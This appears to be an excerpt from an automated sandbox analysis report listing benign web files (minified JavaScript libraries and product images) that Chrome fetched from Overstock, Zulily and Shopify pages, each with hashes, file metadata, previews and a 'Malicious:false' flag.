                                                                                                                                                                                    SHA1:0912A92CEBFC4248B4D561F57B32D18135F9AD59
                                                                                                                                                                                    SHA-256:79951B5BD4D729A2B2F4D380819F2C14BBCF26F21DB56A520189633467766CF4
                                                                                                                                                                                    SHA-512:B0954FF6229C037AAEC67F6CC91889D3AD1C0D38AC3E53E61F3A98D49379FA43C1FF709C7017459B9BD416BCEB2236D90B24C17E072882C122360069DCD9E0E0
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:!function(){"use strict";function t(){t=function(){return e};var e={},d=Object.prototype,n=d.hasOwnProperty,r="function"==typeof Symbol?Symbol:{},o=r.iterator||"@@iterator",i=r.asyncIterator||"@@asyncIterator",a=r.toStringTag||"@@toStringTag";function $(t,e,d){return Object.defineProperty(t,e,{value:d,enumerable:!0,configurable:!0,writable:!0}),t[e]}try{$({},"")}catch(t){$=function(t,e,d){return t[e]=d}}function u(t,e,d,n){var r=e&&e.prototype instanceof s?e:s,o=Object.create(r.prototype),i=new w(n||[]);return o._invoke=function(t,e,d){var n="suspendedStart";return function(r,o){if("executing"===n)throw new Error("Generator is already running");if("completed"===n){if("throw"===r)throw o;return E()}for(d.method=r,d.arg=o;;){var i=d.delegate;if(i){var a=_(i,d);if(a){if(a===c)continue;return a}}if("next"===d.method)d.sent=d._sent=d.arg;else if("throw"===d.method){if("suspendedStart"===n)throw n="completed",d.arg;d.dispatchException(d.arg)}else"return"===d.method&&d.abrupt("return",d.arg);
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (16448), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):16448
                                                                                                                                                                                    Entropy (8bit):5.376075215221623
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:Qk0DXtqs0waW1UVirVhqGK6jNM2tO0cR4wUGdF6As:b0DXtpIeEirHF25UGdi
                                                                                                                                                                                    MD5:271680D59F419A9CE34FDC0A32694547
                                                                                                                                                                                    SHA1:283AEBA466196A97BF7E5C36B0182EA100C8DF0E
                                                                                                                                                                                    SHA-256:A11FE64BE9430DF914190D60DE5A088D24D81262F6C9EB28CA47EF5FEE4CCD9A
                                                                                                                                                                                    SHA-512:CC4DF23E257D0E916CA760485800403D2420D4CDCDBE0580EF789778E88EA77CBEE1A7DAD740FFC20B8BFB01814462CEDE25DDD69F32EA66608B59D08827A37F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/static/page-triggers.247.chunk.a11fe64be9430df914190d60de5a088d24d81262f6c9eb28ca47ef5fee4ccd9a.js
                                                                                                                                                                                    Preview:"use strict";(self.webpackChunkpage_triggers=self.webpackChunkpage_triggers||[]).push([[247],{6247:function(e,t,n){var r=n(5318),i=n(8);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var o=r(n(3038)),l=n(8661),a=n(1611),u=r(n(5697)),d=function(e,t){if(!t&&e&&e.__esModule)return e;if(null===e||"object"!=i(e)&&"function"!=typeof e)return{default:e};var n=f(t);if(n&&n.has(e))return n.get(e);var r={__proto__:null},o=Object.defineProperty&&Object.getOwnPropertyDescriptor;for(var l in e)if("default"!==l&&{}.hasOwnProperty.call(e,l)){var a=o?Object.getOwnPropertyDescriptor(e,l):null;a&&(a.get||a.set)?Object.defineProperty(r,l,a):r[l]=e[l]}return r.default=e,n&&n.set(e,r),r}(n(8860)),s=r(n(4884)),c=n(2615),g=n(6584);function f(e){if("function"!=typeof WeakMap)return null;var t=new WeakMap,n=new WeakMap;return(f=function(e){return e?n:t})(e)}var v=function(e){var t,r,i,u,f,v,p,h,b,m,y,j,_,x,P,O,S,B,w,k,E,C,T,L,D,M,A,I,q,N,U,F,H,R,W,G,K,Q,V,X,z,J,Y,Z,$,ee,te,ne,re,ie,oe,le,ae,
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (2757)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):232071
                                                                                                                                                                                    Entropy (8bit):5.547535542332373
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:UUJGRLxI5q2A415QyqVho8HMTm8ZuCH6fmU/Xx:UWSvA5QyqccyhZuCHjix
                                                                                                                                                                                    MD5:11DD215E31015F50CC5CB0F5778F8CB7
                                                                                                                                                                                    SHA1:A941662C37CD2D07CF369DFB6E1203130EE0FDA4
                                                                                                                                                                                    SHA-256:A4766C8922E13DE981784FD147723E0D0EE0F588E63D289F0C94D34957D2AEC7
                                                                                                                                                                                    SHA-512:2ED6B0FC43DBD40870CD2F232ABD14BDDE880DB1E55B9710DE5F9558D297C50730DBB0647C3DA71265FF584ECAD77D8762DC9CE90D438A4A8A2060E3F0424AFA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:"use strict";this.default_gsi=this.default_gsi||{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x2e244000, 0x660, ]);.var aa,ba,ca,da,t,ea,fa,ha,ja;aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};da=ca(this);t=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writab
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65441), with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):65959
                                                                                                                                                                                    Entropy (8bit):5.353413306184177
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:ZSDqeR7solr3roUzaOGjIj7KkIe0McOYkyJ+nM1Em87o6dHhMHKvOW4QES3OII:cDBFsolr3r7N5yJ+nwENFnESeII
                                                                                                                                                                                    MD5:E4B2C9B152E972CACB77265A161CD311
                                                                                                                                                                                    SHA1:EDD9F41FFFB57C51B7C2B50D4732A61039FF308E
                                                                                                                                                                                    SHA-256:09FA04E84D7038CC32F19BEDCBA454B9E637A35F4DE496E8EC9148C47550F0FC
                                                                                                                                                                                    SHA-512:4263D9EFE7D369A364F785E11BFFBFEA139A1B5CBD129A84E745AAB8F8A1D254EC204963E09CA18365AD851F7491C1F7A61EE28CEB24E7CFF87E4358B8F15069
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:/* clarity-js v0.7.49: https://github.com/microsoft/clarity (License: MIT) */..!function(){"use strict";var t=Object.freeze({__proto__:null,get queue(){return sr},get start(){return cr},get stop(){return lr},get track(){return ar}}),e=Object.freeze({__proto__:null,get clone(){return Cr},get compute(){return Dr},get data(){return Er},get keys(){return Or},get reset(){return Ar},get start(){return _r},get stop(){return Rr},get trigger(){return Ir},get update(){return jr}}),n=Object.freeze({__proto__:null,get check(){return Xr},get compute(){return qr},get data(){return Sr},get start(){return Wr},get stop(){return Ur},get trigger(){return Yr}}),a=Object.freeze({__proto__:null,get compute(){return Kr},get data(){return Fr},get log(){return Gr},get reset(){return Zr},get start(){return Br},get stop(){return Jr},get updates(){return Vr}}),r=Object.freeze({__proto__:null,get callbacks(){return $r},get clear(){return ui},get consent(){return oi},get data(){return Qr},get electron(){return ti},
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2525
                                                                                                                                                                                    Entropy (8bit):7.108229026580988
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVxj5q5g8vrwehYgVLDsom4ZHe76x9odgx9bHm83:NBIl/XrxNqgc5hYKLDsIZHeuwg/bGI
                                                                                                                                                                                    MD5:AA197FD0C528C54C093157C44E84257A
                                                                                                                                                                                    SHA1:28BB4FD709C4E80EA57C933ECFBA5E9DBB12B371
                                                                                                                                                                                    SHA-256:2C4717F9FB53B3EC8E5CA6B7DBD4A06A47D3FFE27F48658A4F99094DB970F422
                                                                                                                                                                                    SHA-512:946ACF96C1DF88078615BD67A5903CB200E98E0BBAFBF8F0E36BB3950D863C45228E3EB58AF8766DE26E95C59265A52D1258D117478A342497452C1C5C26938C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P..................................................................................b&"..}D.1......:..S..i.:................t......./D.})i...q..dHF:R.t....N.w.^.=.X...S.J....j..1..a.....J.....Z.."...n].....Y.Q."br
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1551626
                                                                                                                                                                                    Entropy (8bit):7.999300266728834
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:24576:amqEqlYXaBgxpMfDtbeUNa7B4HF3okxsSaY2Fg+cblz7jMQUrqyK5D+j:amqExaB2MfhbBNaWFxZa1FXcxzPrUrMq
                                                                                                                                                                                    MD5:8A5B1F90851560D322ACA1415732BF05
                                                                                                                                                                                    SHA1:0E8C1A3D6B6AEE6412125FC910B68498D57752B1
                                                                                                                                                                                    SHA-256:C8A93873AE7434792847D094EA8A2401A746A504CD87592D638303944096F345
                                                                                                                                                                                    SHA-512:A4366F0E651781AFBF200147996192F182A984AA6952D76EB407037082F6222565E2987FD2696C08690F6728C24D4836CC9E2D626075A409F0CF3FF9A50A560E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.zulily.com/cdn/shop/files/Homepage_800x800_1.gif?v=1725672247&width=800
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....:.........ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........ANIM..........ANMF.O..............P...VP8 .O..pF...*....>.J.K&$"....0...gnP.1..;/...hx....~G....Yc....:.5...{...?.>|.a.m|.\.<......!...{.O.?....O.>..k...O.a.[...._...x...........c...o......?.w.~j.).........{.......w....Y.c...=._...T....l....zu.......w_..D.hz...Y[....R.....8.}..N!Q%=.......BG.....k.Z6...J....HhA Bv.........U..n...U.M/N4.8...t....%.~.....Z.`.....X.A*T8.A.=..w.%.Qa....Y1...AM.&....,...5..[l.5.;....k....v.9.....8...Y..YTC\..\..;_...rI2...I..".V...T...v:...?....L.{_.,w.*.}vp.....T.,...3.W.4...d#.a...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (37527)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):201423
                                                                                                                                                                                    Entropy (8bit):5.373316699708943
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:oo7S1quXuTXPKS/7fkEhwHT5AZBx6YrJyu/q0Q:9kMPXOlaU
                                                                                                                                                                                    MD5:19491F0C4D32C12CC5AAA98EC8E10405
                                                                                                                                                                                    SHA1:110895977013DBBF605DEE5339E9EDF2309AACE3
                                                                                                                                                                                    SHA-256:CFFB90C03302362D87D681DBD3DC38B9E11681831DB007351AEFA7BBD1E0D223
                                                                                                                                                                                    SHA-512:0594F28AFA6DEE66BCC7E7B43BD01A87013578D15C80797BF6A3B49316A4868679C028B260A9201EEE412E19CE579A585866445E7CF9C419D699805A24D7B5FB
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/vsearch-vendor.2xH_R9Qb.js
                                                                                                                                                                                    Preview:function bu(e){return e&&e.__esModule&&Object.prototype.hasOwnProperty.call(e,"default")?e.default:e}var Mc={exports:{}},li={},Ic={exports:{}},V={};/**.* @license React.* react.production.min.js.*.* Copyright (c) Facebook, Inc. and its affiliates..*.* This source code is licensed under the MIT license found in the.* LICENSE file in the root directory of this source tree..*/var $l=Symbol.for("react.element"),fp=Symbol.for("react.portal"),dp=Symbol.for("react.fragment"),pp=Symbol.for("react.strict_mode"),mp=Symbol.for("react.profiler"),hp=Symbol.for("react.provider"),vp=Symbol.for("react.context"),yp=Symbol.for("react.forward_ref"),gp=Symbol.for("react.suspense"),wp=Symbol.for("react.memo"),Sp=Symbol.for("react.lazy"),na=Symbol.iterator;function Ep(e){return e===null||typeof e!="object"?null:(e=na&&e[na]||e["@@iterator"],typeof e=="function"?e:null)}var zc={isMounted:function(){return!1},enqueueForceUpdate:function(){},enqueueReplaceState:function(){},enqueueSetState:function(){}},Fc=Obj
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1606
                                                                                                                                                                                    Entropy (8bit):6.833721650113342
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:dTCIl/X2YlXWI2PUZ+CEvRFb7PH8hXaUvDmXZ0Fxxu5A:UIl/XflLEJFfPHXkmWHn
                                                                                                                                                                                    MD5:EDA9D0EC92BEA4C6CBA4707CE2EC4640
                                                                                                                                                                                    SHA1:FBF52A90B790A386C09BF80B076E767DAAA3DEDB
                                                                                                                                                                                    SHA-256:43B59B04EBFA9A22655BEF4094171D375F5CA3D40870E2702565F8F9BAD8813B
                                                                                                                                                                                    SHA-512:0ED2B623FF88211040F4BCA6A4581CFF2174142CBF8FA4BF1F73FFD0E54C316915A7D64410488D30EFD3A1171935BC749421AD25F7A5FE4F82DEBB14E38433A2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_fa23d9c5-3c89-4a8f-8b2a-780f85779de8.jpg?v=1729322907&width=80
                                                                                                                                                                                    Preview:RIFF>...WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .........*P.P.>1..C.!..E. ....b.............x?..{b7}......w.W..Vo....PE../......-.sH^.....q.'..'[m3..y.E..X.y.-.<SzVV..[...dt.V.....F[L2O......v...f.y...S.>?..;..p.....ECKx..I?.i.F..n..N.@...9.5..-Z..ft..Xw.p....*..MXU...D.....$.?."ll..|pk.Y.8..Q.-m.G..+?T...... @...X..[lg.........3z1R4......l......K|T2.h|..X:6e..(..[.nT0.K........,.q..!..EA..gX_*..Q...(...h...4..."......QZ)...?."..Oi....V.........K....mR0.z.y......}.-...$......(.cs.....l........5..f.+.$."."/.W....../.&.r.....$....4......h>~.X..Nd.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (11918)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):12166
                                                                                                                                                                                    Entropy (8bit):5.073294047888421
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:srgam9qFdvSXviP/75KXLkmRrQQX4gbpKTnrB0OnbhWH+GH+VMl7/GQsAyXavaKE:srgaYMhWi375k4nfb4H+Gf7/GKrz8yI
                                                                                                                                                                                    MD5:60C2013E230D19854401DBD768D0FBC6
                                                                                                                                                                                    SHA1:EDB76ED6E569C7071446243961746AB89D81083F
                                                                                                                                                                                    SHA-256:31B3B98D61C7F74623C8F048649B6CC56EE378F448FC86C6A0012C5EE7CA3B7C
                                                                                                                                                                                    SHA-512:302A97CD350C11DE768F1CA3475F03C65B01CA6748B1748EFF4543F19A7D36881AA8F0825908765EB7D290C1CB9888A7D75F896683E3A83B002D9B815701C73E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/SubscriptionPriceBreakdown.CxrCP-xw.js
                                                                                                                                                                                    Preview:const __vite__mapDeps=(i,m=__vite__mapDeps,d=(m.f||(m.f=["SubscriptionGroupLine.CD4J-c2w.js","app.DfgMZONA.js","assets/app.whj6cDzT.css","StackedMerchandisePreview.JyjIicj-.js","assets/StackedMerchandisePreview._xnAOXmq.css"])))=>i.map(i=>d[i]);.import{fc as w,fh as R,q as x,bH as I,bI as T,_ as B,e as f,cb as L,a as _,aG as k,ce as b,ci as C,az as M,E as q,bK as N,a$ as E,b1 as $,dh as A,ab as G,lI as U,a8 as S}from"./app.DfgMZONA.js";function ie(){const e=w(),o=R();return x((s,t,c)=>{const p=o.value.defaultAttributes?.shopId||1,r={schemaId:"checkout_display_shipping_methods/1.0",payload:{eventTimestamp:t,shopId:p,apiClientId:c,promiseRetrievalTime:s}};e.record(r)},[e,o.value.defaultAttributes?.shopId])}const z=I({load:()=>T(()=>B(()=>import("./SubscriptionGroupLine.CD4J-c2w.js").then(e=>e.a),__vite__mapDeps([0,1,2,3,4])))});function re({subscriptionLines:e}){const o=f(),{extensionsBefore:u,extensionsAfter:s}=L({targeted:!0,hasMultipleDeliveryGroups:!0}),t=e.length;return t===0?null:_
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):68229
                                                                                                                                                                                    Entropy (8bit):5.494770670942192
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:SE1aJyZYZO8ftZLbLvNu6Y2qmtZuVOadQ9N6WVM2eYAtpulOaNA9N6QSAfpRpbCn:SE1aJmkfbaRiNQfpRooW
                                                                                                                                                                                    MD5:36718D08B950749254A8AFB4E0AB2DBA
                                                                                                                                                                                    SHA1:C9D55AA7C311613B7327A7C282CB8CEEE9750CAA
                                                                                                                                                                                    SHA-256:0E6522F2DF053EA335CFE828517FEE4087C73A8365117124A90571D37236C19F
                                                                                                                                                                                    SHA-512:1D792C9B6B0EB800927980F73F2FF77C381F155D309660A8ED6B5E0B53B48B0617720FB3ED7F9C49D730880945A38CF2772531759A7BCD6F864DC16BB5DCD033
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/static/homepage/_next/static/chunks/735-6ba73dac84dad3b1.js
                                                                                                                                                                                    Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[735],{4184:function(e,t){var n;!function(){"use strict";var r={}.hasOwnProperty;function i(){for(var e=[],t=0;t<arguments.length;t++){var n=arguments[t];if(n){var o=typeof n;if("string"===o||"number"===o)e.push(n);else if(Array.isArray(n)){if(n.length){var a=i.apply(null,n);a&&e.push(a)}}else if("object"===o){if(n.toString!==Object.prototype.toString&&!n.toString.toString().includes("[native code]")){e.push(n.toString());continue}for(var l in n)r.call(n,l)&&n[l]&&e.push(l)}}}return e.join(" ")}e.exports?(i.default=i,e.exports=i):void 0===(n=function(){return i}.apply(t,[]))||(e.exports=n)}()},8566:function(e,t,n){"use strict";var r=n(930),i=n(5696),o=n(7980);Object.defineProperty(t,"__esModule",{value:!0}),t.default=function(e){var t,n=e.src,l=e.sizes,c=e.unoptimized,h=void 0!==c&&c,m=e.priority,C=void 0!==m&&m,L=e.loading,S=e.lazyRoot,N=void 0===S?null:S,_=e.lazyBoundary,O=e.className,A=e.quality,M=e.width,R=e.height,j=e.style,I
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (61316)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):61482
                                                                                                                                                                                    Entropy (8bit):5.508146171238403
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:uYWvuPAadRXadFil26aAn7t2npMvCm+uGYD8BQrEWvyElVlqZw4aN8uDvz6TCLIY:uYW2Pj5yO7t2ACRg8398vh
                                                                                                                                                                                    MD5:09FEC95508BB6201576D3B8FF8E19C37
                                                                                                                                                                                    SHA1:B8CD97960B326E41229792E1A0C92B39CBDAD4B8
                                                                                                                                                                                    SHA-256:948E757FEC2870BC5B65F95AE4637636DA5FB20A4EA3C20A6AC2CF82FFD240E6
                                                                                                                                                                                    SHA-512:D9647CFD7D12358EB4557B3D65AAFD7E9212C3101700CB923A66E3EA0EC2A23715B4FDE1C3B21142B8B6BEF8E858FB10515C2F127DF573B5BBAE1B284568876F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/web-pixel-shopify-app-pixel@0220/sandbox/worker.modern.js
                                                                                                                                                                                    Preview:(()=>{var e={3482:function(e,t,r){var n,i,o;!function(a,s){"use strict";i=[r(3550)],void 0===(o="function"==typeof(n=function(e){var t=/(^|@)\S+:\d+/,r=/^\s*at .*(\S+:\d+|\(native\))/m,n=/^(eval@)?(\[native code])?$/;return{parse:function(e){if(void 0!==e.stacktrace||void 0!==e["opera#sourceloc"])return this.parseOpera(e);if(e.stack&&e.stack.match(r))return this.parseV8OrIE(e);if(e.stack)return this.parseFFOrSafari(e);throw new Error("Cannot parse given Error object")},extractLocation:function(e){if(-1===e.indexOf(":"))return[e];var t=/(.+?)(?::(\d+))?(?::(\d+))?$/.exec(e.replace(/[()]/g,""));return[t[1],t[2]||void 0,t[3]||void 0]},parseV8OrIE:function(t){return t.stack.split("\n").filter((function(e){return!!e.match(r)}),this).map((function(t){t.indexOf("(eval ")>-1&&(t=t.replace(/eval code/g,"eval").replace(/(\(eval at [^()]*)|(,.*$)/g,""));var r=t.replace(/^\s+/,"").replace(/\(eval code/g,"(").replace(/^.*?\s+/,""),n=r.match(/ (\(.+\)$)/);r=n?r.replace(n[0],""):r;var i=this.extractL
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (44139)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):44228
                                                                                                                                                                                    Entropy (8bit):5.078085245617713
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:mQaaN0wEJXENw38WuYN2wSGxy5j8W/BNmvhWvA18k68pflMZVWRV6/h4YxNi6RZL:U8Af2Hy8jDYcEpUMVO+SVgYlqFbiM16h
                                                                                                                                                                                    MD5:7077D5E06DC3EEC307149AED5EA25482
                                                                                                                                                                                    SHA1:C2BB88ACD4BE5F6D5F12B58985AF3138C4F824F7
                                                                                                                                                                                    SHA-256:D2692DF1417AD10491DE9FE0E3815215C8FA799BFD4DFF41D40FD6FC726D5D8C
                                                                                                                                                                                    SHA-512:40A6312C98B9008E0743490D4BC42F8C924E6E893CE3E2970F027AAA0A2C7A9C969C0FAB6368159DADF1A899091C14476AC5F24800D3097579854E61FBDCEECC
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:function focusVisiblePolyfill(){const navKeys=["Tab","ArrowUp","ArrowDown","ArrowLeft","ArrowRight","Enter","Space","Escape","Home","End","PageUp","PageDown"];let currentFocusedElement=null,mouseClick=null;window.addEventListener("keydown",evt=>{navKeys.includes(evt.code)&&(mouseClick=!1)}),window.addEventListener("mousedown",()=>{mouseClick=!0}),window.addEventListener("focus",()=>{currentFocusedElement&&currentFocusedElement.classList.remove("is-focused"),!mouseClick&&(currentFocusedElement=document.activeElement,currentFocusedElement.classList.add("is-focused"))},!0)}try{document.querySelector(":focus-visible")}catch{focusVisiblePolyfill()}(()=>{const{mediaQueries}=theme;if(!mediaQueries)return;const mqKeys=Object.keys(mediaQueries),mqLists={};theme.mediaMatches={};const handleMqChange=()=>{const newMatches=mqKeys.reduce((acc,media)=>(acc[media]=!!(mqLists[media]&&mqLists[media].matches),acc),{});Object.keys(newMatches).forEach(key=>{theme.mediaMatches[key]=newMatches[key]}),window.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ISO Media, AVIF Image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1752
                                                                                                                                                                                    Entropy (8bit):6.341762552644062
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:rGP/joM1sCIl/X2YlXWI2PUSx5R9EPlEXxCuP4AH3COuwtcbY:rGP/joOvIl/XflA5ROcCC73d+Y
                                                                                                                                                                                    MD5:B9570A13E464BFC86AC98FE4966D68E3
                                                                                                                                                                                    SHA1:30A0403344AC033B373DA10EADF046DDD59EC292
                                                                                                                                                                                    SHA-256:14569161EDFC69EA71CBA5927BBC0B1F2A5A61E25FEA04A96E5FA40B1B538428
                                                                                                                                                                                    SHA-512:B9A723DA44B47AB2FDB71AF33685E0844B6009E12C231CFA4453D8AE40821462C74B13739149C5316FDBBE981D8CAE9498CE60872B98324F48FB3E29FCDC4BB9
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_a2ddac44-852d-4d89-b93c-fca4f412dee1.jpg?v=1729323110&width=80
                                                                                                                                                                                    Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm.........4iloc....D@...................*.....................8iinf..........infe........av01.....infe........Exif.....iprp....ipco....colrrICC....lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.............av1C........ispe.......P...P....pixi............ipma...................iref........cdsc..........mdat........d...B2.....@.A......b!T.a...Z..`|.p..0..K. .\c....T.W...qLJt..k&... u.G.H``..7I.Ur;..O..L;.).e..Ycg.m.B.-...;.!......%....i.0I.C......m~....:.V&..Y...\.....{.{S.CUy.24.5.3!I=......d...Y$$T..`....&........@T9..]X>.6.*.uv..bF.8n....h.A
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 800x800, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):143027
                                                                                                                                                                                    Entropy (8bit):7.98910291604706
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:j5MuM0Dx8g8hznRmm7jA6WE+0qdv5mlIk7z74sbB:9Msc3vUEFiml/4st
                                                                                                                                                                                    MD5:34638C8ED12061A092702309619A7192
                                                                                                                                                                                    SHA1:A91E26E131457A546210664BC222AFD2E2966E28
                                                                                                                                                                                    SHA-256:81F4BE943F4A393D7A3D992725126ACFE3637D21CEA17A79BAB3A2CDDF444771
                                                                                                                                                                                    SHA-512:499504B287E3E9F9F2FF295FF83CAF0A0DB3456D3F819A3A93FF12B816B7C5FAAA01A1D38AB5DF847992D288882D8EF5D7C8AB891EC28A470C510C64ACF0B74D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
